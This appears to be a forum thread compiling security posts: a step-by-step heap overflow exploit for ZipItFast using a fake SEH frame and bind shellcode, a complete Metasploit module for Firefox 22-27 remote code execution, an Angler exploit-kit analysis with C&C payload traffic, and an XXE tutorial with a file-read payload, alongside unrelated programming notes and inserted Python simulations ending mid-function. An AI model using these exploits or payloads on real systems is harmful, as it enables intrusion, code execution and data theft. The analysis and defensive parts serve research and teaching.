(.ZIP) Heap Overflow Exploit Oh , and there's also a full exploit here : ZipItFast PRO 3.0 - Heap Overflow Exploit Unfortunately , you won't learn much from the full exploitation since it will work only on Windows XP SP1. Why ? simply because it's using a technique that consists on overwriting the vectored exception handler node that exists in a static address under windows XP SP1. Briefly , all you have to do is find a pointer to your shellcode (buffer) in the stack. Then take the stack address which points to your pointer and after that substract 0x8 from that address and then perform the overwrite. 
When an exception is raised , the vectored exception handlers will be dispatched before any handler from the SEH chain, and your shellcode will be called using a CALL DWORD PTR DS: [ESI + 0x8] (ESI = stack pointer to the pointer to your buffer - 0x8). You can google the _VECTORED_EXCEPTION_NODE and check its elements. And why wouldn't this work under later versions of Windows ? Simply because Microsoft got aware of the use of this technique and now EncodePointer is used to encode the pointer to the handler whenever a new handler is created by the application, and then DecodePointer is called to decode the pointer before the handler is invoked. Okay, let's start building our exploit now from scratch. The POC creates a ZIP file with the largest possible file name , let's try it : N.B : If you want to do some tests , execute the software from command line as follows : Cmd :> C:\blabla\ZipItFast\ZipItFast.exe C:\blabla\exploit.zip Then click on the Test button under the program. Let's try executing the POC now : An access violation happens at 0x00401C76 trying to access an invalid pointer (0x41414141) in our case. Let's see the registers : Basically the FreeList used in this software is a circular doubly linked lists similar to Windows's . The circular doubly linked list head is in the .bss section at address 0x00560478 and its flink and blink pointers are pointing to the head (self pointers) when the custom heap manager is initialized by the software. I also didn't check the full implementation of the FreeList and the free/allocate operations in this software to see if they're similar to Windows's (bitmap , block coalescing ...etc). It's crucial also to know that in our case , the block is being unlinked from the FreeList because the manager had a 'request' to allocate a new block , and it was chosen as best block for the allocation. 
Let's get back to analysing the crash. First I would like to mention that we'll be calling the pointer to the FreeList entry struct "entry". Registers state at 0x00401C76:
EAX = entry->Flink
EDX = entry->Blink
[EAX] = entry->Flink->Flink
[EAX+4] = entry->Flink->Blink (next block's previous block)
[EDX] = entry->Blink->Flink (previous block's next block)
[EDX+4] = entry->Blink->Blink

Logically speaking, the next block's previous block and the previous block's next block are nothing but the current block. So the 2 instructions that do the block unlinking from the FreeList just:
- Set the previous FreeList entry's flink to the block entry's flink.
- Set the next FreeList entry's blink to the block entry's blink.
By doing so, the block doesn't belong to the FreeList anymore and the function simply returns after that.

So it'll be easy to guess what's happening here: the software allocates a static 'heap' block to store the name of the file, and it would have been best to allocate the block based on the filename length from the ZIP header (this could be a fix for the bug, but heap overflows might be found elsewhere; I'll propose a better method to fix, but not fully, this bug later in this article). Now we know that we're writing past our heap block and thus overwriting the custom metadata of the next heap block (flink and blink pointers). So we'll need to find a reliable way to exploit this bug, as the 2 unlinking instructions are the only ones available to us and we control both EAX and EDX (if it's not possible in another case you can see if there are other close instructions that might help). You can think of overwriting the return address or the pointer to the structured exception handler, as we have a stack that won't be rebased after reboot. This might be a working solution in another case where your buffer is stored in a static memory location.
But under Windows 7 it's not the case: VirtualAlloc allocates a chunk of memory with a different base in each program run. In addition, even if the address were static, the location of the freed block that we overwrite varies. So in both cases we'll need to find a pointer to our buffer. The best place to look is the stack. Remember that the software is trying to unlink (allocate) the block that follows the block where we've written the name, so likely all near pointers in the stack (current and previous stack frame) are pointing to the newly allocated block (pointer to metadata). That's what we don't want, because the flink and blink pointers that we might set might not be valid opcodes and might cause exceptions, so all we need to do is try to find a pointer to the first character of the name and then figure out how to use this pointer to gain code execution; this pointer might be in previous stack frames. And here is a pointer pointing to the beginning of our buffer, 3 stack frames away. Remember that 0x01FB2464 will certainly be something else when restarting the program, but the pointer 0x0018F554 is always static, even when restarting the machine.

So when I was at this stage, I started thinking and thinking about a way that would help me redirect execution to my shellcode, which is for sure at the address pointed to by 0x0018F554, using only what's available to me:
- Controlled registers: EAX and EDX.
- Stack pointer to a dynamic buffer pointer.
- 2 unlinking instructions.
- No stack rebase.

Exploiting the vulnerability and gaining code execution: And then I thought, why wouldn't I corrupt the SEH chain and create a fake frame? Because when trying to corrupt an SEH chain there are 3 things that you must know:
- SafeSEH and SEHOP are absent.
- Have a pointer to an existing SEH frame.
- Have a pointer to a pointer to the shellcode.
The pointer to the shellcode will be treated as the handler, and the value pointed to by ((ptr to ptr to shellcode) - 0x4) will be treated as the pointer to the next SEH frame. Let's illustrate the act of corrupting the chain (with a silly illustration, sorry). Let me explain: we need to achieve our goal by using these 2 instructions, right?
MOV [EDX], EAX
MOV [EAX+4], EDX
We'll need 2 pointers and we control 2 registers, but which pointer to give to which register? This must not be a random choice, because you might overwrite the pointer to the shellcode if you choose EAX as a pointer to your fake SEH frame. So we'll need to do the reverse, but taking care not to overwrite anything critical. In addition, we actually don't care about the value of the "next SEH frame" of our fake frame. So our main goal is to overwrite the "next SEH frame" pointer of an existing frame; to do so we need to have a pointer to our fake frame in one of the 2 registers. As [EAX+4] would overwrite the pointer to the buffer if used as a pointer to the fake SEH frame, we will use EDX instead. We must also not overwrite the original handler pointer, because it will be executed first to try to handle the exception; if it fails, then our fake handler (shellcode) will be invoked. So:
EDX = &(pointer to shellcode) - 0x4 = pointer to the fake "Next SEH frame" element.
EDX must reside in the next frame field of the original frame, which is [EAX+4].
And EAX = SEH frame - 0x4.

Original frame after overwrite:
Pointer to next SEH: Fake Frame
Exception Handler: Valid Handler

Fake frame:
Pointer to next SEH: (Original Frame) - 0x4 (we just don't care about this one)
Exception Handler: Pointer to shellcode

The SEH frame I chose is at 0x0018F4B4. So EAX = 0x0018F4B4 - 0x4 = 0x0018F4B0 and EDX = 0x0018F554 - 0x4 = 0x0018F550. When the overwrite is done the function will return normally to its caller, and all we have to do now is wait for an exception to occur.
An exception will occur after a dozen instructions, as the metadata is badly corrupted. The original handler will be executed but it will fail to handle the access violation, and then our fake handler, which is the shellcode, will be called.

Making the exploit work: Now all we need to do is calculate the distance between the 1st character of the name and the flink and blink pointers, and then insert our pointers in the POC. Inserting the shellcode: The space between the starting address of the buffer and the overwritten heap metadata is not so large, so it's best to put an unconditional jump at the start of our buffer to jump past the overwritten flink and blink pointers, and then put the shellcode just after the pointers. As we can calculate the length, this won't cause any problem. Final exploit here: [Perl] ZipItFast Heap Overflow - Pastebin.com. I chose a bind shellcode, which opens a connection on 0.0.0.0:4444. Let's try opening the ZIP file using ZipItFast and then check "netstat -an | find "4444"": Bingo!

A fix for this vulnerability? The method I stated before, which consists of allocating the block based on the filename length from the ZIP headers, can only fix the vulnerability in this case, but what if the attackers were also able to cause an overflow elsewhere in the software? The best way to fix the bug is this: when a block is about to be allocated and is about to be unlinked from the FreeList, the first thing that must be done is checking the validity of the doubly linked list. To do so, safe unlinking must be performed, which was introduced in later versions of Windows.
Safe unlinking is done the following way:
if (entry->flink->blink != entry->blink->flink || entry->blink->flink != entry) {
    // Fail, FreeList corrupted, exit process
} else {
    // Unlink, then return the block to the caller
}
Let's see how safe unlinking is implemented under Windows 7. The function we'll look at is RtlAllocateHeap, exported by ntdll. Even if this method looks secure, there is some research published online that describes weaknesses of this technique and how it can be bypassed. I also made sure to implement this technique in my custom heap manager (line 86), link above. I hope that you've enjoyed reading this paper. See you again soon, Souhail Hammou.

Source: Reverse Engineering 0x4 Fun: Windows Heap Overflow Exploitation
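As an added illustration (not the post's code, nor ZipItFast's or the author's heap manager), here are the two unlink writes from the crash site and the safe-unlink check from the paragraph above, run against a simulated 32-bit FreeList. A small little-endian address space in a bytearray holds the list head, an in-use block that receives the file name, and the free block that follows it; the file-name copy has no length check, so a long name lands on the next block's flink and blink. The base address, block size, name buffer and the two target addresses are constructed for the demo.

```python
import struct

# Simulated 32-bit target, as in the post (Windows 7, 32-bit ZipItFast build).
# Every address and size below is constructed for the demo.
PTR = 4
BASE, SIZE = 0x00400000, 0x4000
HEAD = BASE                        # FreeList head (stand-in for the .bss head)
NAME_LEN = 32                      # fixed-size 'heap' block that receives the name
BLOCK_A = BASE + 0x1000            # in-use block: 8-byte header (flink, blink) + data
BLOCK_B = BLOCK_A + 8 + NAME_LEN   # the free block right after it, on the FreeList
STACK = BASE + 0x3000              # stand-in for the stack the fake pointers aim at


class FreeListCorrupted(Exception):
    """Raised by safe_unlink when a neighbour does not point back at the entry."""


class Memory:
    """Flat little-endian address space backed by a bytearray."""

    def __init__(self):
        self.buf = bytearray(SIZE)

    def _off(self, addr, n):
        off = addr - BASE
        if not 0 <= off <= SIZE - n:
            raise MemoryError("access violation at %#010x" % addr)
        return off

    def rd(self, addr):
        return struct.unpack_from("<I", self.buf, self._off(addr, PTR))[0]

    def wr(self, addr, value):
        struct.pack_into("<I", self.buf, self._off(addr, PTR), value)

    def copy(self, addr, data):
        off = self._off(addr, len(data))
        self.buf[off:off + len(data)] = data


def list_init(mem, head):
    mem.wr(head, head)              # head->flink = head (self pointers, as in the post)
    mem.wr(head + 4, head)          # head->blink = head


def list_insert_tail(mem, head, entry):
    last = mem.rd(head + 4)
    mem.wr(entry, head)             # entry->flink = head
    mem.wr(entry + 4, last)         # entry->blink = last
    mem.wr(last, entry)             # last->flink = entry
    mem.wr(head + 4, entry)         # head->blink = entry


def unsafe_unlink(mem, entry):
    """The two instructions at the crash site, with no validation."""
    eax = mem.rd(entry)             # EAX = entry->Flink
    edx = mem.rd(entry + 4)         # EDX = entry->Blink
    mem.wr(edx, eax)                # MOV [EDX], EAX
    mem.wr(eax + 4, edx)            # MOV [EAX+4], EDX


def safe_unlink(mem, entry):
    """Safe unlinking: both neighbours must still point back at the entry."""
    flink, blink = mem.rd(entry), mem.rd(entry + 4)
    if mem.rd(flink + 4) != entry or mem.rd(blink) != entry:
        raise FreeListCorrupted("entry %#010x not referenced by its neighbours" % entry)
    mem.wr(blink, flink)
    mem.wr(flink + 4, blink)


def build_heap():
    mem = Memory()
    list_init(mem, HEAD)
    list_insert_tail(mem, HEAD, BLOCK_B)
    return mem


def store_name(mem, name):
    # The bug: the name is copied into a fixed-size block with no length check,
    # so bytes past NAME_LEN overwrite BLOCK_B's flink and blink.
    mem.copy(BLOCK_A + 8, name)


def demo_intact():
    """Allocating from an intact list works and leaves the head self-linked."""
    mem = build_heap()
    safe_unlink(mem, BLOCK_B)
    return mem.rd(HEAD) == HEAD and mem.rd(HEAD + 4) == HEAD


def demo_overflow(unlink):
    """Overflow the name, unlink BLOCK_B with the given routine, and return
    what ended up at the two attacker-chosen addresses."""
    mem = build_heap()
    fake_flink, fake_blink = STACK + 0x10, STACK + 0x40   # constructed targets
    name = b"A" * NAME_LEN + struct.pack("<II", fake_flink, fake_blink)
    store_name(mem, name)
    unlink(mem, BLOCK_B)
    return mem.rd(fake_blink), mem.rd(fake_flink + 4)


def demo_detect():
    """True if safe_unlink refuses the corrupted entry."""
    try:
        demo_overflow(safe_unlink)
    except FreeListCorrupted:
        return True
    return False


if __name__ == "__main__":
    print("intact list unlinks:", demo_intact())
    print("unchecked unlink wrote:", [hex(v) for v in demo_overflow(unsafe_unlink)])
    print("safe unlink refused corrupted list:", demo_detect())
```

demo_overflow(unsafe_unlink) returns what the two instructions wrote at the attacker-chosen addresses (the write-what-where the post builds its SEH trick on); with safe_unlink the same overflow is refused, because neither neighbour points back at the entry. Note that the check itself dereferences the corrupted pointers, so pointers into unmapped memory fault before the comparison rather than being reported; that is still better than the silent write.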
  14. [h=3]Windows Internals - Quantum end context switching[/h] Hello, lately I decided to start sharing the notes I gather, almost daily, while reverse engineering and studying Windows. As I focused in the last couple of days on studying context switching, I was able to decompile the most involved functions and study them, noting the important stuff along the way. The result of this whole process was a flowchart. Before getting to the flowchart, let's start by putting ourselves in the main plot. As you might know, each thread runs for a period of time before another thread is scheduled to run, excluding the cases where the thread is preempted, enters a wait state or is terminated. This time period is called a quantum. Every time a clock interval ends (mostly 15 ms) the system clock issues an interrupt. While dispatching the interrupt, the thread's current cycle count is checked against its cycle count target (quantum target) to see if it has reached or exceeded its quantum, so that the context would be switched to the next thread scheduled to run. Note that a context switch in Windows doesn't happen only when a thread has exceeded its quantum; it also happens when a thread enters a wait state or when a higher priority thread is ready to run and thus preempts the current thread. As it will take some time to organize my detailed notes and share them here as an article (maybe later), consider the previous explanation a small introduction to the topic. However, the flowchart goes through the details involved in quantum end context switching. Please consider downloading the PDF to be able to zoom as much as you like in your PDF reader, because Google Docs doesn't provide enough zooming functionality to read the chart.
Preview (unreadable): PDF full size. Download: GoogleDocs link.

P.S.:
- As always, this article is based on Windows 7 32-bit.
- Note that details concerning the routine that does the context switching (SwapContext) aren't included in the chart and are left for a next post.

See you again soon. -Souhail.

Source: Reverse Engineering 0x4 Fun: Windows Internals - Quantum end context switching
  15. Firefox WebIDL Privileged Javascript Injection
Authored by joev, Marius Mlynski | Site metasploit.com

This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's Javascript APIs.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/exploitation/jsobfu'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  autopwn_info({
    :ua_name    => HttpClients::FF,
    :ua_minver  => "22.0",
    :ua_maxver  => "27.0",
    :javascript => true,
    :rank       => ExcellentRanking
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox WebIDL Privileged Javascript Injection',
      'Description'    => %q{
        This exploit gains remote code execution on Firefox 22-27 by abusing two
        separate privilege escalation vulnerabilities in Firefox's Javascript
        APIs.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Marius Mlynski', # discovery and pwn2own exploit
        'joev'            # metasploit module
      ],
      'DisclosureDate' => "Mar 17 2014",
      'References'     => [
        ['CVE', '2014-1510'], # open chrome:// url in iframe
        ['CVE', '2014-1511']  # bypass popup blocker to load bare ChromeWindow
      ],
      'Targets'        => [
        [
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch'     => ARCH_FIREFOX
          }
        ],
        [
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch'     => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget'  => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(22, 27) }
      }
    ))

    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
    ], self.class)
  end

  def on_request_exploit(cli, request, target_info)
    send_response_html(cli, generate_html(target_info))
  end

  def generate_html(target_info)
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    frame = Rex::Text.rand_text_alpha(5 + rand(12))
    r = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
    data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
               "{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
               "'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"

    js = Rex::Exploitation::JSObfu.new(%Q|
      var opts = #{JSON.unparse(opts)};
      var key = opts['#{key}'];

      // Load the chrome-privileged browser XUL script into an iframe
      var c = new mozRTCPeerConnection;
      c.createOffer(function(){},function(){
        window.open('chrome://browser/content/browser.xul', '#{frame}');
        step1();
      });

      // Inject a data: URI into an internal frame inside of the browser
      // XUL script to pop open a new window with the chrome flag to prevent
      // the new window from being wrapped with browser XUL;
      function step1() {
        var clear = setInterval(function(){
          // throws until frames[0].frames[2] is available (when chrome:// iframe loads)
          frames[0].frames[2].location;
          // we base64 this to avoid the script tag screwing up things when obfuscated
          frames[0].frames[2].location=window.atob('#{Rex::Text.encode_base64(data_uri)}');
          clearInterval(clear);
          setTimeout(step2, 100);
        },10);
      }

      // Step 2: load the chrome-level window up with a data URI, which
      // gives us same-origin. Make sure to load an "<iframe mozBrowser>"
      // into the frame, since that will respond to our messageManager
      // (this is important later)
      function step2() {
        var clear = setInterval(function(){
          top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
                             'src="about:blank"></iframe></body></html>';
          clearInterval(clear);
          setTimeout(step3, 100);
        }, 10);
      }

      function step3() {
        var clear = setInterval(function(){
          if (!frames[0]) return; // will throw until the frame is accessible
          top.vvv.messageManager.loadFrameScript('data:,'+key, false);
          clearInterval(clear);
          setTimeout(function(){top.vvv.close();}, 100);
        }, 10);
      }
    |)

    js.obfuscate

    %Q|
      <!doctype html>
      <html>
        <body>
          <iframe id='#{frame}' name='#{frame}' style='position:absolute;left:-9999999px;height:1px;width:1px;'>
          </iframe>
          <script>
            #{js}
          </script>
          #{datastore['CONTENT']}
        </body>
      </html>
    |
  end
end

Source: Firefox WebIDL Privileged Javascript Injection ? Packet Storm
  16. FBVector

[h=2]folly/FBvector.h[/h] Simply replacing std::vector with folly::fbvector (after having included the folly/FBVector.h header file) will improve the performance of your C++ code using vectors with common coding patterns. The improvements are always non-negative, almost always measurable, frequently significant, sometimes dramatic, and occasionally spectacular.

[h=3]Sample[/h]
folly::fbvector<int> numbers({0, 1, 2, 3});
numbers.reserve(10);
for (int i = 4; i < 10; i++) {
  numbers.push_back(i * 2);
}
assert(numbers[6] == 12);

[h=3]Motivation[/h] std::vector is the stalwart abstraction many use for dynamically-allocated arrays in C++. It is also the best known and most used of all containers. It may therefore seem a surprise that std::vector leaves important - and sometimes vital - efficiency opportunities on the table. This document explains how our own drop-in abstraction fbvector improves key performance aspects of std::vector. Refer to folly/test/FBVectorTest.cpp for a few benchmarks.

Source: https://github.com/facebook/folly/blob/master/folly/docs/FBVector.md
  17. HOW (AND WHY) WE DEFEATED DIRCRYPT DirCrypt is a particularly nasty variant of ransomware. In addition to encrypting most of the user’s files and demanding ransom for their decryption, the malware stays resident in the system, and immediately encrypts any new file which is created or saved. Therefore, the user is completely prevented from using the computer normally. The normal advice to victims of ransomware is to recover files from some previous backup. If there isn’t a backup, the victims are given the option of either accepting the loss of their data—or paying the attacker. However, Check Point’s Malware Research Team has found that in the case of DirCrypt, victims of the malware can recover almost all of their data, due to several weaknesses in the way the malware implements its crypto functionality. Download: http://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf
  18. HowTo: Debug Android APKs with Eclipse and DDMS
Source: http://blog.dornea.nu/2014/08/21/howto-debug-android-apks-with-eclipse-and-ddms/

1. Download apktool
git clone git://github.com/iBotPeaches/Apktool.git
find . -name "apktool-cli.jar"
cp ./brut.apktool/apktool-cli/build/libs/apktool-cli.jar /tmp

2. Dump the APK
java -jar /tmp/apktool-cli.jar d -d FakeBanker.apk -o source

3. Set the application to debug mode
If you want to do it manually, open the AndroidManifest.xml file and search for the application tag. Then insert the new attribute android:debuggable='true' like I did:

4. Build the new app
# java -jar /tmp/apktool-cli.jar b -d source FakeBanker.Debug.apk

5. Unzip the debug application and make a jar file
unzip FakeBanker.Debug.apk -d unpacked
cd unpacked
# dex2jar classes.dex -> classes-dex2jar.jar

6. Use jd-gui to save all the source of the jar

7. Sign the application
git clone https://github.com/appium/sign
# java -jar sign/dist/signapk.jar sign/testkey.x509.pem sign/testkey.pk8 FakeBanker.Debug.apk FakeBanker.Debug.Signed.apk

8. Install the application on your mobile
# adb devices -l
# adb install FakeBanker.Debug.Signed.apk

To add some source into the app:
# mkdir source/src
# unzip classes-dex2jar.src.zip -d source/src

Debug settings: go to Device Settings -> Select debug app. Also make sure you have "Wait for debugger".

Create a new Java project in Eclipse:
1. Create a new Java project and use source as the location of the project
2. Add the src folder to the build path
3. Check project properties
4. Set breakpoints
5. And run (switching to debug mode).

Source: HowTo: Debug Android APKs with Eclipse and DDMS | Offensive Security Blog V2.0
  19. Angler EK : now capable of "fileless" infection (memory malware)

(Image: Matrix - Agent Jackson avoiding bullets)

(First edition: I asked for help to study this. Hopefully, more technical details to come soon.)

A few days ago I spotted a new pattern in some Angler EK threads:

(Image: New pattern in a Vawtrak thread from Angler EK. Fired: CVE-2013-2551 - 2014-08-28)

(Image: New pattern in another Vawtrak thread from Angler EK. Fired: CVE-2014-0515 - 2014-08-29)

GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1
Accept: */*
Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: rwvs30r2zq.akdnbfb.com
Connection: Keep-Alive

Wondering what it was and going over different infection paths, I spotted only one thread without this "new" count?b.
[Note: on 2014-08-31 count?b appeared on that thread too]

(Image: Angler EK - 2014-08-28 "Memory Malware" thread)

The exploits' hashes were the same as on all other threads, but my usual tools were not able to gather the payload, and what surprised me more is that HIPS (like Faronics antiexec) were bypassed (note: I tried Malwarebytes AntiExploit and it was able to spot the ROP and stack pivoting). I spent some time figuring out what was happening here: Angler EK is now able to infect a host without writing the malware to the drive (it's injected directly into the process running the exploited plugin).

(Image: Angler EK (no landing on this screen, CVE-2014-0515 fired) and call back from the malware injected in Internet Explorer. 2nd stage drop: 275c5f650261e80d864faf7cc6b70774, injecting itself into explorer and then gathering Necurs on the same C&C (e.g.: be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28, b0e3e860a2dc62cb40fd6ef897ad592b - 2014-08-29, 5830dfde30873176d05604677bab6bd9 - 2014-08-30))

Malware call back in https to koqpisea.in : 217.23.3.204
49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM

Call for 2nd stage payload looks like:
POST https://koqpisea.in/ HTTP/1.1
Host: koqpisea.in
Content-Length: 94
Connection: Keep-Alive
Cache-Control: no-cache

{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}

This feature opens a wide range of possibilities.
Aside from being a powerful way to bypass AV, and an ideal way for a one-time stealer or loader (Pony, Jolly Roger, Andromeda, Smoke Bot, etc.), it also allows a detailed check of the infected host before getting a little more noisy and writing anything on disk. It also makes it difficult to grab the dropper (you have to get it from memory or from the recorded traffic and then decode it). This is a powerful move for the attack side.

Additional illustrations:

(Image: Injected plugin-container calling C&C after successful "memory malware" infection via Silverlight on Firefox and Windows 7 - 2014-08-30)

(Image: Courtesy of Will Metcalf from Emerging Threats. Java calling payload then "memory payload" activity captured by his Cuckoo instance - 2014-08-28)

Hopefully more to come soon.

Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for help and advice.

Files: AnglerEK_MM_2014-08-31 (Fiddlers + C&C calls - Owncloud). If you want to play with Volatility or whatever, here is the memory (Mega) of a VM when IE was injected and calling C&C (IE pid: 860).

(Image: Capture of Fiddler just before pausing the VM - 2014-08-30)

Source: Malware don't need Coffee: Angler EK : now capable of "fileless" infection (memory malware)
  20. XML External Entity Injection For Fun and Maybe Profit
Ed_A | August 28, 2014

(Image: Ooo injection…or maybe oww injection. Source: https://flic.kr/p/5LPRs7)

The eXtensible markup language, or XML, is commonly used in applications. XML allows data to be represented in a structured manner and is handled by an XML parser. XML parsers open up new avenues for web attacks including XML Injection, Entity Expansion and the topic of this blog, XML External Entity Injection; but first, some background.

SOAP Web Services
The Simple Object Access Protocol, or SOAP, is a type of web service. SOAP is standards based. The transport is XML over HTTP in both directions. A standard SOAP request looks like this one available at http://www.webservicex.net/ws/WSDetails.aspx?CATID=2&WSID=9:

POST /stockquote.asmx HTTP/1.1
Host: www.webservicex.net
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://www.webserviceX.NET/GetQuote"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetQuote xmlns="http://www.webserviceX.NET/">
      <symbol>string</symbol>
    </GetQuote>
  </soap:Body>
</soap:Envelope>

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetQuoteResponse xmlns="http://www.webserviceX.NET/">
      <GetQuoteResult>string</GetQuoteResult>
    </GetQuoteResponse>
  </soap:Body>
</soap:Envelope>

A SOAP envelope containing XML is sent to the server via POST, processed by an XML parser, and the server responds with a SOAP envelope containing the response.
XXE
XML External Entity (XXE) injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage. XXE Injection is an attack in which an attacker defines an arbitrary entity that is executed by the XML parser if the parser lacks validation checks. Entities are used as abbreviations to represent a repetitive value. External entities can reference files on the parser's filesystem; exploiting this feature may allow retrieval of arbitrary files, or denial of service by causing the server to read from a file such as /dev/random. They can also reference URLs; exploiting this feature may allow port scanning from the XML parser's host, or the retrieval of sensitive web content which is otherwise inaccessible due to network topology and defenses. An attack string would look like:

<!DOCTYPE foo [<!ENTITY test SYSTEM "file:///c:/windows/win.ini"> ]>

This string is referred to as a DTD or Document Type Declaration. A DTD is simply a mechanism for defining entities. The DOCTYPE declaration "foo" is not important; this can be any arbitrary value. The value "SYSTEM" indicates the file should be read from the location that follows. This string is telling the XML parser to replace references to "&test;" with the contents of C:\Windows\win.ini. This could be any file readable by the account under which the application is running. The defined entity "test" would then be inserted into the normal SOAP message in a value.
The full attack payload would resemble:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [<!ENTITY test SYSTEM "file:///c:/windows/win.ini"> ]>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetQuoteResponse xmlns="http://www.webserviceX.NET/">
      <GetQuoteResult>&test;</GetQuoteResult>
    </GetQuoteResponse>
  </soap:Body>
</soap:Envelope>

If the service is vulnerable, it should return:

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetQuoteResponse xmlns="http://www.webserviceX.NET/">
      <GetQuoteResult>; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo
asx=MPEGVideo
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wmx=MPEGVideo
wpl=MPEGVideo
wvx=MPEGVideo</GetQuoteResult>
    </GetQuoteResponse>
  </soap:Body>
</soap:Envelope>

This attack is beginning to appear more often despite the fact that the vulnerability has existed for years. In January, Facebook paid one of the largest bounties to date for an XXE vulnerability discovered in OpenID (Facebook Pays $33,500 Bounty for Major Code Execution Flaw | Threatpost | The first stop for security news). If you read the article, you will see that XXE can be turned into remote code execution. Intriguing…

Fixes
Validate user supplied input before passing it to the XML parser for processing.
Additionally, the parser may be able to disable DTD parsing and/or disable resolution of external entities via configuration options. As always, feel free to reach out to us here at FoD with any questions via Twitter (@hpappsecurity) or via email (fodsales(at)hp.com). We'd love to hear your questions or comments about our data breaches, identity theft management, and how it affects you.

Source: XML External Entity Injection For Fun and Maybe Pr... - HP Enterprise Business Community
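An added example (not from the HP post) of the two fixes it names, using the xml.sax parser from Python's standard library. It builds the same SOAP payload as above, with the SYSTEM entity pointed at a constructed temporary file instead of win.ini, then parses it three ways: with external general entities enabled the file contents land inside GetQuoteResult; with that feature off the reference expands to nothing; and a pre-check that refuses any DOCTYPE rejects the document before the parser sees it. The feature is set explicitly on every parse so the outcome does not depend on the interpreter's default. QuoteHandler, reject_dtd, parse_quote and demo are names chosen here.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


class DtdNotAllowed(ValueError):
    """Raised when a document carries a DOCTYPE and DTDs are not accepted."""


class QuoteHandler(ContentHandler):
    """Collects the text inside <GetQuoteResult> (constructed helper)."""

    def __init__(self):
        super().__init__()
        self.in_result = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "GetQuoteResult":
            self.in_result = True

    def endElement(self, name):
        if name == "GetQuoteResult":
            self.in_result = False

    def characters(self, content):
        if self.in_result:
            self.chunks.append(content)


def soap_payload(path):
    """The post's attack payload, with the SYSTEM entity aimed at a local file."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<!DOCTYPE foo [<!ENTITY test SYSTEM "%s"> ]>\n'
        '<soap:Envelope xmlns:soap="%s">\n'
        "  <soap:Body>\n"
        '    <GetQuoteResponse xmlns="http://www.webserviceX.NET/">\n'
        "      <GetQuoteResult>&test;</GetQuoteResult>\n"
        "    </GetQuoteResponse>\n"
        "  </soap:Body>\n"
        "</soap:Envelope>\n" % (path, SOAP_NS)
    ).encode("utf-8")


def reject_dtd(payload):
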